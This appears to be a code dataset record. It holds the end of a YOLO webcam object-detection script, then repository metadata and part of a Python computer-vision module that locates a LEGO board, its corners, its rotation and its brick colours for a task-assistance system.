if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
# My kingdom for a good redistributable image drawing library.我国一个好的可再分配图像图库
for i in range(thickness):
draw.rectangle(
[left + i, top + i, right - i, bottom - i],
outline=self.colors[c])
draw.rectangle(
[tuple(text_origin), tuple(text_origin + label_size)],
fill=self.colors[c])
draw.text(text_origin, label, fill=(0, 0, 0), font=font)
del draw
end = timer()
print(end - start)
return image
def close_session(self):
self.sess.close()
def detect_video(yolo, video_path, output_path=""):
import cv2
vid = cv2.VideoCapture(0)
if not vid.isOpened():
raise IOError("Couldn't open webcam or video")
video_FourCC = int(vid.get(cv2.CAP_PROP_FOURCC))
video_fps = vid.get(cv2.CAP_PROP_FPS)
video_size = (int(vid.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT)))
isOutput = True if output_path != "" else False
if isOutput:
print("!!! TYPE:", type(output_path), type(video_FourCC), type(video_fps), type(video_size))
out = cv2.VideoWriter(output_path, video_FourCC, video_fps, video_size)
accum_time = 0
curr_fps = 0
fps = "FPS: ??"
prev_time = timer()
while True:
return_value, frame = vid.read()
image = Image.fromarray(frame)
image = yolo.detect_image(image)
result = np.asarray(image)
curr_time = timer()
exec_time = curr_time - prev_time
prev_time = curr_time
accum_time = accum_time + exec_time
curr_fps = curr_fps + 1
if accum_time > 1:
accum_time = accum_time - 1
fps = "FPS: " + str(curr_fps)
curr_fps = 0
cv2.putText(result, text=fps, org=(3, 15), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.50, color=(255, 0, 0), thickness=2)
cv2.namedWindow("result", cv2.WINDOW_NORMAL)
cv2.imshow("result", result)
if isOutput:
out.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
yolo.close_session()
| 41.079439
| 112
| 0.607098
|
626b61ef79ec3041be73a1d9a0d81a9605515777
| 82,175
|
py
|
Python
|
gabriel_lego/cv/lego_cv.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | null | null | null |
gabriel_lego/cv/lego_cv.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | null | null | null |
gabriel_lego/cv/lego_cv.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
# - Task Assistance
#
# Author: Zhuo Chen <zhuoc@cs.cmu.edu>
# Extended and ported to Python 3 by: Manuel Olguín Muñoz <molguin@kth.se>
#
# Copyright (C) 2011-2019 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
import cv2
import numpy as np
from gabriel_lego.cv import bitmap as bm, zhuocv3 as zc
from gabriel_lego.cv.colors import HSVValue, LEGOColorBlue, \
LEGOColorDOBMaskBlack, LEGOColorGreen, LEGOColorRed, LEGOColorWhite, \
LEGOColorYellow, SimpleHSVColor
from gabriel_lego.lego_engine import config
# Errors
class LEGOCVError(Exception):
pass
class NoBoardDetectedError(LEGOCVError):
pass
class NoLEGODetectedError(LEGOCVError):
pass
class LowConfidenceError(LEGOCVError):
pass
################################ BASICS ########################################
def set_config(is_streaming):
config.setup(is_streaming)
def has_a_brick(mask, min_peri=None, min_area=None, min_span=None,
print_max_area=False):
contours, hierarchy = cv2.findContours(mask, mode=cv2.RETR_CCOMP,
method=cv2.CHAIN_APPROX_NONE)
max_area = 0
ret = False
for cnt_idx, cnt in enumerate(contours):
if hierarchy[0, cnt_idx, 3] != -1: # not holes
continue
if print_max_area and cv2.contourArea(cnt) > max_area:
max_area = cv2.contourArea(cnt)
if min_peri is not None and len(cnt) < min_peri:
continue
if min_area is not None and cv2.contourArea(cnt) < min_area:
continue
if min_span is not None:
max_p = cnt.max(axis=0)
min_p = cnt.min(axis=0)
diff_p = max_p - min_p
if diff_p.min() + 1 < min_span:
continue
ret = True
break
if print_max_area:
print(max_area)
return ret
################################ SHAPE #########################################
def is_line_seg_close(line1, line2):
pt1_1 = np.array(line1[0: 2])
pt1_2 = np.array(line1[2: 4])
pt2_1 = np.array(line2[0: 2])
pt2_2 = np.array(line2[2: 4])
l1 = zc.euc_dist(pt1_1, pt1_2)
l2 = zc.euc_dist(pt2_1, pt2_2)
v1 = pt1_2 - pt1_1
v2 = pt2_1 - pt1_1
v3 = pt2_2 - pt1_1
area1 = np.absolute(np.cross(v1, v2))
area2 = np.absolute(np.cross(v1, v3))
if max(area1, area2) < l1 * l2 / 3:
return True
else:
return False
# def is_line_seg_close2(line1, line2):
# pt1_1 = np.array(line1[0: 2])
# pt1_2 = np.array(line1[2: 4])
# pt2_1 = np.array(line2[0: 2])
# pt2_2 = np.array(line2[2: 4])
# l1 = zc.euc_dist(pt1_1, pt1_2)
# v1 = pt1_2 - pt1_1
# v2 = pt2_1 - pt1_1
# v3 = pt2_2 - pt1_1
# area1 = np.absolute(np.cross(v1, v2))
# area2 = np.absolute(np.cross(v1, v3))
# d1 = area1 * 2 / l1
# d2 = area2 * 2 / l1
# return (d1 <= 3 and d2 <= 3)
def line_intersect(a, b):
x1 = a[0];
y1 = a[1];
x2 = a[2];
y2 = a[3]
x3 = b[0];
y3 = b[1];
x4 = b[2];
y4 = b[3]
d = (float(x1 - x2) * float(y3 - y4)) - (float(y1 - y2) * float(x3 - x4))
if d:
x = ((x1 * y2 - y1 * x2) * (x3 - x4) - (x1 - x2) * (
x3 * y4 - y3 * x4)) / d
y = ((x1 * y2 - y1 * x2) * (y3 - y4) - (y1 - y2) * (
x3 * y4 - y3 * x4)) / d
else:
x, y = (-1, -1)
return x, y
def get_corner_pts(bw, perimeter=None, center=None, method='line'):
"""
Given an input image @bw where the borders of a rough rectangle are
masked, the function detects its corners
Two methods:
'line' tries to detect four lines first, and
'point' directly gets the top-left, top-right, bottom-left, bottom-right
points
The function returns None if cannot find the corners with confidence
"""
if method == 'line':
center = (center[1], center[0]) # in (x, y) format
perimeter = int(perimeter)
lines = cv2.HoughLinesP(bw, 1, np.pi / 180, perimeter // 40,
minLineLength=perimeter // 20,
maxLineGap=perimeter // 20)
# lines = lines[0]
# HoughLines used to have a different return format which required us
# to extract the first element of a tuple to get the list of lines
# the new format returns a list of 2d-arrays so instead we iterate
# directly over the list and extract the first element of each element
# This is only for test
# img = np.zeros((bw.shape[0], bw.shape[1], 3), dtype=np.uint8)
# for line in lines:
# pt1 = (line[0], line[1])
# pt2 = (line[2], line[3])
# print (pt1, pt2)
# cv2.line(img, pt1, pt2, (255, 255, 255), 3)
# cv2.namedWindow('test')
# display_image('test', img, wait_time = config.DISPLAY_WAIT_TIME,
# resize_max = config.DISPLAY_MAX_PIXEL, save_image = config.SAVE_IMAGE)
# get four major lines
new_lines = list()
for line in lines:
line = line[0]
flag = True
for new_line in new_lines:
if is_line_seg_close(line, new_line):
flag = False
break
if flag:
new_lines.append(list(line))
if len(new_lines) != 4:
raise NoBoardDetectedError(
'Cannot locate exact four board corners: could not find four '
'lines in bitmap.')
# get four reasonable line intersections
corners = list()
for idx1, line1 in enumerate(new_lines):
for idx2, line2 in enumerate(new_lines):
if idx1 >= idx2:
continue
inter_p = line_intersect(line1, line2)
if inter_p == (-1, -1):
continue
dist = zc.euc_dist(inter_p, center)
if dist < perimeter // 3:
corners.append(inter_p)
if len(corners) != 4:
raise NoBoardDetectedError(
'Cannot locate exact four board corners.')
# put the four corners in order
dtype = [('x', float), ('y', float)]
corners = np.array(corners, dtype=dtype)
corners = np.sort(corners, order='y')
if corners[0][0] < corners[1][0]:
ul = corners[0];
ur = corners[1]
else:
ul = corners[1];
ur = corners[0]
if corners[2][0] < corners[3][0]:
bl = corners[2];
br = corners[3]
else:
bl = corners[3];
br = corners[2]
ul = list(ul)
ur = list(ur)
bl = list(bl)
br = list(br)
# some sanity check here
len_b = zc.euc_dist(bl, br)
len_u = zc.euc_dist(ul, ur)
len_l = zc.euc_dist(ul, bl)
len_r = zc.euc_dist(ur, br)
# check that the lengths are not TOO dissimilar
if not (0.8 <= (len_b / len_u) <= 1.2) \
or not (0.8 <= (len_l / len_r) <= 1.2):
raise NoBoardDetectedError(
'Cannot locate exact four board corners: difference between '
'opposing edges exceeds 20%.')
elif method == 'point':
bw = bw.astype(bool)
row_mtx, col_mtx = np.mgrid[0: bw.shape[0], 0: bw.shape[1]]
row_mtx = row_mtx[bw]
col_mtx = col_mtx[bw]
row_plus_col = row_mtx + col_mtx
ul_idx = np.argmin(row_plus_col)
ul = (col_mtx[ul_idx], row_mtx[ul_idx])
br_idx = np.argmax(row_plus_col)
br = (col_mtx[br_idx], row_mtx[br_idx])
row_minus_col = row_mtx - col_mtx
ur_idx = np.argmin(row_minus_col)
ur = (col_mtx[ur_idx], row_mtx[ur_idx])
bl_idx = np.argmax(row_minus_col)
bl = (col_mtx[bl_idx], row_mtx[bl_idx])
else:
raise RuntimeError(f'Unrecognized method {method}.')
corners = np.float32([ul, ur, bl, br])
return corners
def calc_thickness(corners, stretch_ratio):
corners_tmp = corners.copy()
ul = corners_tmp[0]
ul[1] *= stretch_ratio
ur = corners_tmp[1]
ur[1] *= stretch_ratio
bl = corners_tmp[2]
bl[1] *= stretch_ratio
br = corners_tmp[3]
br[1] *= stretch_ratio
len_b = zc.euc_dist(bl, br)
um = (ul + ur) / 2
seen_board_height = zc.calc_triangle_area(bl, br, um) * 2 / len_b
real_board_height = len_b * config.BOARD_RECONSTRUCT_HEIGHT / \
config.BOARD_RECONSTRUCT_WIDTH
real_brick_height = real_board_height / config.BOARD_RECONSTRUCT_HEIGHT * \
config.BRICK_HEIGHT
seen_brick_height = seen_board_height / config.BOARD_RECONSTRUCT_HEIGHT * \
config.BRICK_HEIGHT
S_theta = seen_brick_height / real_brick_height # sin theta
if S_theta >= 1:
C_theta = 0
else:
C_theta = (1 - S_theta * S_theta) ** 0.5
real_brick_thickness = real_brick_height / \
config.BRICK_HEIGHT_THICKNESS_RATIO
seen_brick_thickness = real_brick_thickness * C_theta
seen_brick_thickness /= stretch_ratio
return seen_brick_thickness
def get_rotation_degree(bw):
lines = cv2.HoughLinesP(bw, 1, np.pi / 180, 6, minLineLength=8,
maxLineGap=5)
if lines is None:
return None
lines = lines[0]
if len(lines) > 60:
return None
# plotting lines, for testing only ############################
# img = np.zeros((bw.shape[0], bw.shape[1], 3), dtype=np.uint8)
# for line in lines:
# pt1 = (line[0], line[1])
# pt2 = (line[2], line[3])
# cv2.line(img, pt1, pt2, (255, 255, 255), 1)
# cv2.namedWindow('bw')
# display_image('bw', bw)
# cv2.namedWindow('test')
# display_image('test', img)
################################################################
degrees = np.zeros(len(lines))
for line_idx, line in enumerate(lines):
x_diff = line[0] - line[2]
y_diff = line[1] - line[3]
if x_diff == 0:
degree = np.pi / 2 # TODO
else:
degree = np.arctan(float(y_diff) / x_diff)
degrees[line_idx] = degree * 180 / np.pi
# get an angle in (-45, 45]
if degrees[line_idx] <= 0:
degrees[line_idx] += 90
if degrees[line_idx] > 45:
degrees[line_idx] -= 90
# now use RANSAC like algorithm to get the consensus
max_vote = 0
consensus_degree = None
for degree in degrees:
n_vote = 0
for degree_cmp in degrees:
angle_diff = zc.angle_dist(degree, degree_cmp, angle_range=90)
if abs(angle_diff) < 5:
n_vote += 10 - abs(angle_diff)
if n_vote > max_vote:
max_vote = n_vote
consensus_degree = degree
best_degree = 0
for degree_cmp in degrees:
angle_diff = zc.angle_dist(consensus_degree, degree_cmp, angle_range=90)
if abs(angle_diff) < 5:
best_degree += angle_diff * (10 - abs(angle_diff))
best_degree = best_degree / max_vote + consensus_degree
if best_degree > 45:
best_degree -= 90
if best_degree <= -45:
best_degree += 90
return best_degree
def rotate(img, n_iterations=2):
'''
Assuming major line patterns in an image are vertical and horizontal,
this function tries to
correct the rotaion to make vertical lines really vertical and horizontal
lines really horizontal.
'''
img_ret = img
rotation_degree = 0
rotation_mtx = None
for iteration in range(
n_iterations): # Sometimes need multiple iterations to get the
# rotation right
bw = cv2.cvtColor(img_ret, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(bw, 50, 100)
rotation_degree_tmp = get_rotation_degree(edges)
if rotation_degree_tmp is None:
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot get rotation degree'}
# return (rtn_msg, None)
raise LEGOCVError('Cannot get rotation degree.')
weight = 1
for i in range(3):
bw[:] = img_ret[:, :, i][:]
edges = cv2.Canny(bw, 50, 100)
d = get_rotation_degree(edges)
if d is not None:
rotation_degree_tmp += d
weight += 1
rotation_degree_tmp /= weight
rotation_degree += rotation_degree_tmp
# print rotation_degree
img_shape = img.shape
M = cv2.getRotationMatrix2D((img_shape[1] / 2, img_shape[0] / 2),
rotation_degree, scale=1)
rotation_mtx = M
img_ret = cv2.warpAffine(img, M, (img_shape[1], img_shape[0]))
return img_ret, rotation_degree, rotation_mtx
def crop(img, borders):
shape = img.shape
is_color = (len(shape) == 3 and shape[2] > 1)
if borders is None:
if is_color:
bw = zc.get_mask(img)
else:
bw = img
rows, cols = np.nonzero(bw)
min_row = min(rows);
max_row = max(rows)
min_col = min(cols);
max_col = max(cols)
else:
min_row, max_row, min_col, max_col = borders
if is_color:
img_cropped = img[min_row: max_row + 1, min_col: max_col + 1, :]
else:
img_cropped = img[min_row: max_row + 1, min_col: max_col + 1]
return img_cropped, (min_row, max_row, min_col, max_col)
def smart_crop(img):
bw = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, bi = cv2.threshold(bw, 0, 1, cv2.THRESH_BINARY)
# TODO: has a risk that the sum here may excede uint8...
sum_0 = bi.sum(axis=0)
sum_1 = bi.sum(axis=1)
i_start = 0;
i_end = bi.shape[0] - 1;
j_start = 0;
j_end = bi.shape[1] - 1
i_start_cmp_val = sum_1[int(round(config.BRICK_HEIGHT / 4.0 * 2))] * 0.6
while sum_1[i_start] < i_start_cmp_val:
i_start += 1
i_end_cmp_val = sum_1[bi.shape[0] - 1 - int(
round(config.BRICK_HEIGHT / 4.0 * 2))] * 0.6
while sum_1[i_end] < i_end_cmp_val:
i_end -= 1
j_start_cmp_val = sum_0[int(round(config.BRICK_WIDTH / 4.0 * 2))] * 0.6
while sum_0[j_start] < j_start_cmp_val:
j_start += 1
j_end_cmp_val = sum_0[bi.shape[1] - 1 - int(
round(config.BRICK_WIDTH / 4.0 * 2))] * 0.6
while sum_0[j_end] < j_end_cmp_val:
j_end -= 1
# print (bi.shape, i_start, i_end, j_start, j_end)
return img[i_start: i_end + 1, j_start: j_end + 1, :], (
i_start, i_end, j_start, j_end)
################################ COLOR #########################################
def normalize_brightness(img, mask=None, method='hist', max_percentile=100,
min_percentile=0):
shape = img.shape
if mask is None:
mask = np.ones((shape[0], shape[1]), dtype=bool)
if mask.dtype != bool:
mask = mask.astype(bool)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
v = hsv[:, :, 2]
if method == 'hist':
hist, bins = np.histogram(v.flatten(), 256, [0, 256])
hist[0] = 0
cdf = hist.cumsum()
cdf_m = np.ma.masked_equal(cdf, 0)
cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())
cdf = np.ma.filled(cdf_m, 0).astype('uint8')
v_ret = cdf[v]
elif method == 'max':
max_v = np.percentile(v[mask], max_percentile)
min_v = np.percentile(v[mask], min_percentile)
v[np.bitwise_and((v < min_v), mask)] = min_v
# What the hell is converScaleAbs doing??? why need abs???
v_ret = cv2.convertScaleAbs(v, alpha=254.0 / (max_v - min_v),
beta=-(min_v * 254.0 / (max_v - min_v) - 2))
v[mask] = v_ret[mask]
v_ret = v
else:
raise RuntimeError(f'Unrecognized method {method}.')
hsv[:, :, 2] = v_ret
img_ret = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return img_ret
def normalize_color(img, mask_info=None, mask_apply=None, method='hist',
max_percentile=100, min_percentile=0):
shape = img.shape
if mask_info is None:
mask_info = np.ones((shape[0], shape[1]), dtype=bool)
if mask_info.dtype != bool:
mask_info = mask_info.astype(bool)
if mask_apply is None:
mask_apply = mask_info
if mask_apply.dtype != bool:
mask_apply = mask_apply.astype(bool)
img_ret = img.copy()
if method == 'hist': # doesn't work well for over-exposed images
for i in range(3):
v = img[:, :, i]
hist, bins = np.histogram(v[mask_info].flatten(), 256, [0, 256])
cdf = hist.cumsum()
cdf_m = np.ma.masked_equal(cdf, 0)
cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())
cdf = np.ma.filled(cdf_m, 0).astype('uint8')
v[mask_apply] = cdf[v[mask_apply]]
img_ret[:, :, i] = v
elif method == 'grey':
img = img.astype(float)
max_rgb = 0
for i in range(3):
v = img[:, :, i]
# print v[mask_info].mean()
v[mask_apply] = v[mask_apply] / v[mask_info].mean()
img[:, :, i] = v
if v[mask_apply].max() > max_rgb:
max_rgb = v[mask_apply].max()
img[mask_apply, :] = img[mask_apply, :] * 255 / max_rgb
img = img.astype(np.uint8)
img_ret = img
elif method == 'select_grey':
img = img.astype(np.int64)
mask_blue_over_exposed = (img[:, :, 0] >= 250)
mask_green_over_exposed = (img[:, :, 1] >= 250)
mask_red_over_exposed = (img[:, :, 2] >= 250)
# print "Blue over exposure: %d" % mask_blue_over_exposed.sum()
mask_over_bright = ((img[:, :, 0] + img[:, :, 1] + img[:, :, 2]) >= 666)
mask_over_exposed = np.bitwise_and(zc.super_bitwise_or((
mask_blue_over_exposed,
mask_green_over_exposed,
mask_red_over_exposed)),
mask_over_bright)
# print "Over exposure: %d" % mask_over_bright.sum()
mask_info = np.bitwise_and(mask_info, np.invert(mask_over_exposed))
img = img.astype(float)
max_rgb = 0
for i in range(3):
v = img[:, :, i]
v[mask_apply] = v[mask_apply] / v[mask_info].mean()
img[:, :, i] = v
if v[mask_apply].max() > max_rgb:
max_rgb = v[mask_apply].max()
img[mask_apply, :] = img[mask_apply, :] * 255 / max_rgb
img = img.astype(np.uint8)
img = normalize_brightness(img, mask=mask_apply, max_percentile=90,
method='max')
img[mask_over_exposed, 0] = 255
img[mask_over_exposed, 1] = 255
img[mask_over_exposed, 2] = 255
img_ret = img
elif method == 'max':
# b, g, r = cv2.split(img)
# img = cv2.merge((b, g, r))
for i in range(3):
v = img[:, :, i]
max_v = np.percentile(v[mask], max_percentile)
min_v = np.percentile(v[mask], min_percentile)
v[v < min_v] = min_v
v_ret = cv2.convertScaleAbs(v, alpha=220.0 / (max_v - min_v),
beta=-(min_v * 220.0 / (
max_v - min_v) - 35))
v_ret = v_ret[:, :, 0]
v[mask] = v_ret[mask]
img_ret[:, :, i] = v
else:
raise RuntimeError(f'Unrecognized method {method}.')
return img_ret
# def color_inrange(img, color_space, hsv=None,
# B_L=0, B_U=255,
# G_L=0, G_U=255,
# R_L=0, R_U=255,
# H_L=0, H_U=179,
# S_L=0, S_U=255,
# V_L=0, V_U=255):
# if color_space == 'BGR':
# lower_range = np.array([B_L, G_L, R_L], dtype=np.uint8)
# upper_range = np.array([B_U, G_U, R_U], dtype=np.uint8)
# mask = cv2.inRange(img, lower_range, upper_range)
# elif color_space == 'HSV':
# if hsv is None:
# hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# lower_range = np.array([H_L, S_L, V_L], dtype=np.uint8)
# upper_range = np.array([H_U, S_U, V_U], dtype=np.uint8)
# mask = cv2.inRange(hsv, lower_range, upper_range)
# return mask
# def detect_color(img_hsv, color, on_surface=False):
# '''
# detect the area in @img_hsv with a specific @color, and return the @mask
# @img_hsv is the input in HSV color space
# @color is a string, describing color
# Currently supported colors: Black, White
# In OpenCV HSV space, H is in [0, 179], the other two are in [0, 255]
# '''
# if color == "black":
# mask1_1 = color_inrange(None, 'HSV', hsv=img_hsv[0], V_U=50)
# mask1_2 = color_inrange(None, 'HSV', hsv=img_hsv[1], S_U=60)
# mask1 = cv2.bitwise_and(mask1_1, mask1_2)
# mask2_1 = color_inrange(None, 'HSV', hsv=img_hsv[0], V_U=20)
# mask2_2 = color_inrange(None, 'HSV', hsv=img_hsv[1], S_U=100)
# mask2 = cv2.bitwise_and(mask2_1, mask2_2)
# mask = cv2.bitwise_or(mask1, mask2)
# elif color == "white":
# mask = color_inrange(None, 'HSV', hsv=img_hsv, S_U=60, V_L=190)
# else:
# print("ERROR: color detection has specified an undefined color!!!!")
#
# return mask
def gen_mask_for_color(hsv_img: np.ndarray,
color: SimpleHSVColor,
mask_src: np.ndarray,
on_surface=False):
mask_nothing = np.zeros(mask_src.shape, dtype=np.uint8)
mask_color = color.get_mask(hsv_img)
mask_color = cv2.bitwise_and(mask_color, mask_src)
mask_color_bool = mask_color.astype(bool)
if np.any(mask_color_bool) and has_a_brick(mask_color, min_area=20,
min_span=5):
S_mean = np.median(hsv_img[mask_color_bool, 1])
# S_mean is in a 0-255 scale, convert it to 0 - 100
S_mean = (S_mean / 255.0) * 100.0
tmp_color = SimpleHSVColor(
low_bound=HSVValue(hue=color.low_bound.hue,
saturation=int(S_mean * 0.7),
value=color.low_bound.value),
high_bound=color.high_bound
)
# mask_color = color_inrange(None, 'HSV', hsv=hsv, H_L=45, H_U=96,
# S_L=int(S_mean * 0.7))
mask_color = tmp_color.get_mask(hsv_img)
if not has_a_brick(cv2.bitwise_and(mask_color, mask_src),
min_area=20, min_span=5):
mask_color = mask_nothing
if on_surface:
V_ref = np.percentile(hsv_img[mask_color_bool, 2], 75)
# mask_green_on = color_inrange(img, 'HSV', hsv=hsv, H_L=45, H_U=96,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# v_ref is also on a 0-255 scale...
V_ref = (V_ref / 255.0) * 100.0
tmp_color = SimpleHSVColor(
low_bound=HSVValue(hue=color.low_bound.hue,
saturation=int(S_mean * 0.7),
value=int(V_ref * 0.75)),
high_bound=color.high_bound
)
mask_color_on = tmp_color.get_mask(hsv_img)
mask_color = (mask_color, mask_color_on)
else:
mask_color = mask_nothing if not on_surface else (
mask_nothing, mask_nothing)
return mask_color
def detect_colors(img, mask_src, on_surface=False):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
if mask_src is None:
mask_src = np.ones(img.shape[0:2], dtype=np.uint8) * 255
# mask_nothing = np.zeros(mask_src.shape, dtype=np.uint8)
mask_green = gen_mask_for_color(hsv, LEGOColorGreen, mask_src, on_surface)
mask_yellow = gen_mask_for_color(hsv, LEGOColorYellow, mask_src, on_surface)
mask_red = gen_mask_for_color(hsv, LEGOColorRed, mask_src, on_surface)
mask_blue = gen_mask_for_color(hsv, LEGOColorBlue, mask_src, on_surface)
return mask_green, mask_red, mask_yellow, mask_blue
# detect green
# mask_green = color_inrange(img, 'HSV', hsv=hsv, H_L=45, H_U=96, S_L=80)
# mask_green = LEGOColorGreen.get_mask(hsv)
# mask_green = cv2.bitwise_and(mask_green, mask_src)
# mask_green_bool = mask_green.astype(bool)
# if np.any(mask_green_bool) and has_a_brick(mask_green, min_area=20,
# min_span=5):
# S_mean = np.median(hsv[mask_green_bool, 1])
# mask_green = color_inrange(img, 'HSV', hsv=hsv, H_L=45, H_U=96,
# S_L=int(S_mean * 0.7))
# if not has_a_brick(cv2.bitwise_and(mask_green, mask_src), min_area=20,
# min_span=5):
# mask_green = mask_nothing
# if on_surface:
# V_ref = np.percentile(hsv[mask_green_bool, 2], 75)
# mask_green_on = color_inrange(img, 'HSV', hsv=hsv, H_L=45, H_U=96,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# mask_green = (mask_green, mask_green_on)
# else:
# mask_green = mask_nothing if not on_surface else (
# mask_nothing, mask_nothing)
# # detect yellow
# mask_yellow = color_inrange(img, 'HSV', hsv=hsv, H_L=8, H_U=45, S_L=90)
# mask_yellow = cv2.bitwise_and(mask_yellow, mask_src)
# mask_yellow_bool = mask_yellow.astype(bool)
# if np.any(mask_yellow_bool) and has_a_brick(mask_yellow, min_area=20,
# min_span=5):
# S_mean = np.median(hsv[mask_yellow_bool, 1])
# mask_yellow = color_inrange(img, 'HSV', hsv=hsv, H_L=8, H_U=45,
# S_L=int(S_mean * 0.7))
# if not has_a_brick(cv2.bitwise_and(mask_yellow, mask_src),
# min_area=20,
# min_span=5):
# mask_yellow = mask_nothing
# if on_surface:
# V_ref = np.percentile(hsv[mask_yellow_bool, 2], 75)
# mask_yellow_on = color_inrange(img, 'HSV', hsv=hsv, H_L=8, H_U=45,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# mask_yellow = (mask_yellow, mask_yellow_on)
# else:
# mask_yellow = mask_nothing if not on_surface else (
# mask_nothing, mask_nothing)
# # detect red
# mask_red1 = color_inrange(img, 'HSV', hsv=hsv, H_L=0, H_U=10, S_L=105)
# mask_red2 = color_inrange(img, 'HSV', hsv=hsv, H_L=160, H_U=179, S_L=105)
# mask_red = cv2.bitwise_or(mask_red1, mask_red2)
# mask_red = cv2.bitwise_and(mask_red, mask_src)
# mask_red_bool = mask_red.astype(bool)
# if np.any(mask_red_bool) and has_a_brick(mask_red, min_area=20,
# min_span=5):
# S_mean = np.median(hsv[mask_red_bool, 1])
# mask_red1 = color_inrange(img, 'HSV', hsv=hsv, H_L=0, H_U=10,
# S_L=int(S_mean * 0.7))
# mask_red2 = color_inrange(img, 'HSV', hsv=hsv, H_L=160, H_U=179,
# S_L=int(S_mean * 0.7))
# mask_red = cv2.bitwise_or(mask_red1, mask_red2)
# if not has_a_brick(cv2.bitwise_and(mask_red, mask_src), min_area=20,
# min_span=5):
# mask_red = mask_nothing
# if on_surface:
# V_ref = np.percentile(hsv[mask_red_bool, 2], 75)
# mask_red1_on = color_inrange(img, 'HSV', hsv=hsv, H_L=0, H_U=10,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# mask_red2_on = color_inrange(img, 'HSV', hsv=hsv, H_L=160,
# H_U=179,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# mask_red_on = cv2.bitwise_or(mask_red1_on, mask_red2_on)
# mask_red = (mask_red, mask_red_on)
# else:
# mask_red = mask_nothing if not on_surface else (
# mask_nothing, mask_nothing)
# # detect blue
# mask_blue = color_inrange(img, 'HSV', hsv=hsv, H_L=93, H_U=140, S_L=125)
# mask_blue = cv2.bitwise_and(mask_blue, mask_src)
# mask_blue_bool = mask_blue.astype(bool)
# if np.any(mask_blue_bool) and has_a_brick(mask_blue, min_area=20,
# min_span=5):
# S_mean = np.median(hsv[mask_blue_bool, 1])
# mask_blue = color_inrange(img, 'HSV', hsv=hsv, H_L=93, H_U=140,
# S_L=int(S_mean * 0.8))
# if not has_a_brick(cv2.bitwise_and(mask_blue, mask_src), min_area=20,
# min_span=5):
# mask_blue = mask_nothing
# if on_surface:
# V_ref = np.percentile(hsv[mask_blue_bool, 2], 75)
# mask_blue_on = color_inrange(img, 'HSV', hsv=hsv, H_L=93, H_U=140,
# S_L=int(S_mean * 0.8),
# V_L=V_ref * 0.75)
# mask_blue = (mask_blue, mask_blue_on)
# else:
# mask_blue = mask_nothing if not on_surface else (
# mask_nothing, mask_nothing)
def detect_colorful(img, on_surface=False):
lower_bound = [0, 100, 20]
upper_bound = [179, 255, 255]
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
lower_range = np.array(lower_bound, dtype=np.uint8)
upper_range = np.array(upper_bound, dtype=np.uint8)
mask = cv2.inRange(img_hsv, lower_range, upper_range)
return mask
##################### Some major functions #########################
def _locate_board(img, display_list):
## Find some black
DoB = zc.get_DoB(img, config.BLUR_KERNEL_SIZE, 1, method='Average')
# zc.check_and_display('DoB', DoB, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# mask_black = color_inrange(DoB, 'HSV', V_L=config.BLACK_DOB_MIN_V)
mask_black = LEGOColorDOBMaskBlack.get_mask(DoB)
# zc.check_and_display('mask_black', mask_black, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## 1. find black dots (somewhat black, and small)
## 2. find area where black dots density is high
if 'mask_black_dots' in display_list:
mask_black_dots = np.zeros(mask_black.shape, dtype=np.uint8)
contours, hierarchy = cv2.findContours(mask_black, mode=cv2.RETR_CCOMP,
method=cv2.CHAIN_APPROX_NONE)
bd_counts = np.zeros((config.BD_COUNT_N_ROW,
config.BD_COUNT_N_COL)) # count black dots in each
# block
for cnt_idx, cnt in enumerate(contours):
if len(cnt) > config.BD_MAX_PERI or (hierarchy[0, cnt_idx, 3] != -1):
continue
if config.CHECK_BD_SIZE == 'complete':
max_p = cnt.max(axis=0)
min_p = cnt.min(axis=0)
diff_p = max_p - min_p
if diff_p.max() > config.BD_MAX_SPAN:
continue
mean_p = cnt.mean(axis=0)[0]
bd_counts[int(mean_p[1] / config.BD_BLOCK_HEIGHT), int(
mean_p[0] / config.BD_BLOCK_WIDTH)] += 1
if 'mask_black_dots' in display_list:
cv2.drawContours(mask_black_dots, contours, cnt_idx, 255, -1)
if 'mask_black_dots' in display_list:
zc.display_image('mask_black_dots', mask_black_dots,
wait_time=config.DISPLAY_WAIT_TIME,
resize_max=config.DISPLAY_MAX_PIXEL,
save_image=config.SAVE_IMAGE)
